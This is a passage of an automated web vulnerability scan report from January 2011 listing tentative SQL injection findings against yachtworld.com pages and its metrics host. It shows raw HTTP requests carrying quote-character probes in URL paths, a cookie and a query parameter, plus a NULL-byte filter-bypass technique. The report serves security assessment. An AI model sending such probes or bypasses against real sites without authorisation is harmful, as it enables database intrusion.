GET /b''/ss/deyachtworld/1/H.17/s43772089285776?AQB=1&ndh=1&t=27/0/2011%2013%3A24%3A8%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=searchResults_US&g=http%3A//www.yachtworld.com/core/listing/cache/searchResults.jsp%3Fcit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dhomepage%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26cur&r=http%3A//www.yachtworld.com/core/listing/advancedSearch.jsp%3FNtk%3DboatsEN%26searchtype%3Dhomepage%26fromYear%3D2004%26sm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26toLength%3D32%26fromLength%3D24%26fromPrice%3D0%26man%3Dregulator%26slim%3Dquick%26is%3Dfalse%26pricderange%3DSelect%2BPrice%2BRange&cc=USD&ch=Search&server=ywapp04&events=event2%2Cevent1&c1=Search%20Results&h1=Boats%7CAdvanced%20Search&v3=searchResults_US&c4=no%20search%20phrase%20entered&v4=no%20search%20phrase%20entered&c5=regulator&v5=regulator&c6=used&v6=used&c7=no%20search%20phrase%20entered&v7=no%20search%20phrase%20entered&c8=24%27-32%27&v8=24%27-32%27&c9=%3E2004&v9=%3E2004&c10=no%20search%20phrase%20entered&v10=no%20search%20phrase%20entered&c11=no%20search%20phrase%20entered&v11=no%20search%20phrase%20entered&c12=no%20search%20phrase%20entered&v12=no%20search%20phrase%20entered&c13=no%20search%20phrase%20entered&v13=no%20search%20phrase%20entered&c14=no%20search%20phrase%20entered&v14=no%20search%20phrase%20entered&c15=no%20search%20phrase%20entered&v15=no%20search%20phrase%20entered&c16=no%20search%20phrase%20entered&v16=no%20search%20phrase%20entered&c17=united%20states&v17=united%20states&c18=no%20search%20phrase%20entered&v18=no%20search%20phrase%20entered&c19=74&c20=Homepage&c21=Default&c22=2%3A15PM&c23=Thursday&c24=Weekday&c27=www.yachtworld.com&v27=Homepage&v28=www.yachtworld.com&v31=Default&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pid=advancedSearch_US&pidt=1&oid=Search&oidt=3&ot=SUBMIT&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp?cit=true&slim=quick&ybw=&sm=3&searchtype=homepage&Ntk=boatsEN&Ntt=&is=false&man=regulator&hmid=0&ftid=0&enid=0&fromLength=24&toLength=32&luom=126&fromYear=2004&toYear=&fromPrice=0&toPrice=&currencyid=100&city=&rid=&cint=100&pbsint=&boatsAddedSelected=-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; s_pers=%20s_nr%3D1296156248340%7C1298748248340%3B%20s_lv%3D1296156248342%7C1390764248342%3B%20s_lv_s%3DFirst%2520Visit%7C1296158048342%3B; s_sess=%20s_sq%3Ddeyachtworld%253D%252526pid%25253DadvancedSearch_US%252526pidt%25253D1%252526oid%25253DSearch%252526oidt%25253D3%252526ot%25253DSUBMIT%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:37:26 GMT
Server: Omniture DC/2.0.0
xserver: www632
Content-Length: 0
Content-Type: text/html

1.5. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s48372025459539 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://metrics.yachtworld.com
Path:	/b/ss/deyachtworld/1/H.17/s48372025459539

Issue detail

Request 1

GET /b'/ss/deyachtworld/1/H.17/s48372025459539?AQB=1&pccr=true&vidn=26A0E25385162B05-600001A6003F61D3&&ndh=1&t=27/0/2011%2013%3A17%3A16%204%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.yachtworld.com/core/listing/cache/pl_search_results.jsp%3Fywo%3Dstarlingmarine%26ps%3D50%26type%3D%26new%3D%26luom%3D126%26hosturl%3Dstarlingmarine%26page%3Dbroker%26slim%3Dbroker%26lineonly&r=http%3A//www.starlingmarine.com/used-new-boats-wilmington-morehead-nc.html&cc=USD&ch=BrokerWebSites&events=event2&c22=2%3A15PM&v22=2%3A15PM&c23=Thursday&v23=Thursday&c24=Weekday&v24=Weekday&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=713&bh=1200&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp?ywo=starlingmarine&ps=50&type=&new=&luom=126&hosturl=starlingmarine&page=broker&slim=broker&lineonly
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.1.10.1296155835; s_pers=%20s_nr%3D1296155836661%7C1298747836661%3B%20s_lv%3D1296155836663%7C1390763836663%3B%20s_lv_s%3DFirst%2520Visit%7C1296157636663%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:31:29 GMT
Server: Omniture DC/2.0.0
Content-Length: 441
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/deyachtworld/1/H.17/s48372025459539 was not fo
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/deyachtworld/1/H.17/s48372025459539?AQB=1&pccr=true&vidn=26A0E25385162B05-600001A6003F61D3&&ndh=1&t=27/0/2011%2013%3A17%3A16%204%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.yachtworld.com/core/listing/cache/pl_search_results.jsp%3Fywo%3Dstarlingmarine%26ps%3D50%26type%3D%26new%3D%26luom%3D126%26hosturl%3Dstarlingmarine%26page%3Dbroker%26slim%3Dbroker%26lineonly&r=http%3A//www.starlingmarine.com/used-new-boats-wilmington-morehead-nc.html&cc=USD&ch=BrokerWebSites&events=event2&c22=2%3A15PM&v22=2%3A15PM&c23=Thursday&v23=Thursday&c24=Weekday&v24=Weekday&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=713&bh=1200&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp?ywo=starlingmarine&ps=50&type=&new=&luom=126&hosturl=starlingmarine&page=broker&slim=broker&lineonly
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.1.10.1296155835; s_pers=%20s_nr%3D1296155836661%7C1298747836661%3B%20s_lv%3D1296155836663%7C1390763836663%3B%20s_lv_s%3DFirst%2520Visit%7C1296157636663%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:31:29 GMT
Server: Omniture DC/2.0.0
xserver: www493
Content-Length: 0
Content-Type: text/html

1.6. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s48372025459539 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://metrics.yachtworld.com
Path:	/b/ss/deyachtworld/1/H.17/s48372025459539

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /b/ss/deyachtworld/1%00'/H.17/s48372025459539?AQB=1&ndh=1&t=27/0/2011%2013%3A17%3A16%204%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.yachtworld.com/core/listing/cache/pl_search_results.jsp%3Fywo%3Dstarlingmarine%26ps%3D50%26type%3D%26new%3D%26luom%3D126%26hosturl%3Dstarlingmarine%26page%3Dbroker%26slim%3Dbroker%26lineonly&r=http%3A//www.starlingmarine.com/used-new-boats-wilmington-morehead-nc.html&cc=USD&ch=BrokerWebSites&events=event2&c22=2%3A15PM&v22=2%3A15PM&c23=Thursday&v23=Thursday&c24=Weekday&v24=Weekday&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=713&bh=1200&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp?ywo=starlingmarine&ps=50&type=&new=&luom=126&hosturl=starlingmarine&page=broker&slim=broker&lineonly
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.1.10.1296155835; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296155836661%7C1298747836661%3B%20s_lv%3D1296155836663%7C1390763836663%3B%20s_lv_s%3DFirst%2520Visit%7C1296157636663%3B

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:40:05 GMT
Server: Omniture DC/2.0.0
Content-Length: 419
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/deyachtworld/1 was not found on this server.</p
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/deyachtworld/1%00''/H.17/s48372025459539?AQB=1&ndh=1&t=27/0/2011%2013%3A17%3A16%204%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.yachtworld.com/core/listing/cache/pl_search_results.jsp%3Fywo%3Dstarlingmarine%26ps%3D50%26type%3D%26new%3D%26luom%3D126%26hosturl%3Dstarlingmarine%26page%3Dbroker%26slim%3Dbroker%26lineonly&r=http%3A//www.starlingmarine.com/used-new-boats-wilmington-morehead-nc.html&cc=USD&ch=BrokerWebSites&events=event2&c22=2%3A15PM&v22=2%3A15PM&c23=Thursday&v23=Thursday&c24=Weekday&v24=Weekday&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=713&bh=1200&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp?ywo=starlingmarine&ps=50&type=&new=&luom=126&hosturl=starlingmarine&page=broker&slim=broker&lineonly
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.1.10.1296155835; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296155836661%7C1298747836661%3B%20s_lv%3D1296155836663%7C1390763836663%3B%20s_lv_s%3DFirst%2520Visit%7C1296157636663%3B

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:40:05 GMT
Server: Omniture DC/2.0.0
xserver: www663
Content-Length: 0
Content-Type: text/html

1.7. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [VIEWED_BOATS_STORE cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.yachtworld.com
Path:	/privatelabel/listing/pl_boat_detail_handler.jsp

Issue detail

The VIEWED_BOATS_STORE cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the VIEWED_BOATS_STORE cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757&currency=USD&units=Feet&currencyid=100&boat_id=2267335&primary_photo_id=30&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States%00'; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response 1 (redirected)

HTTP/1.0 503 Service Temporarily Unavailable
Date: Thu, 27 Jan 2011 20:02:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Temporarily Unavailable</title>
</head><body>
<h1>Service Temporarily Unavailable</h1>
<p>The server is temporarily u
...[SNIP]...

Request 2

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757&currency=USD&units=Feet&currencyid=100&boat_id=2267335&primary_photo_id=30&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States%00''; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response 2 (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:02:16 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...

1.8. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [primary_photo_id parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.yachtworld.com
Path:	/privatelabel/listing/pl_boat_detail_handler.jsp

Issue detail

The primary_photo_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the primary_photo_id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757&currency=USD&units=Feet&currencyid=100&boat_id=2267335&primary_photo_id=30'&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
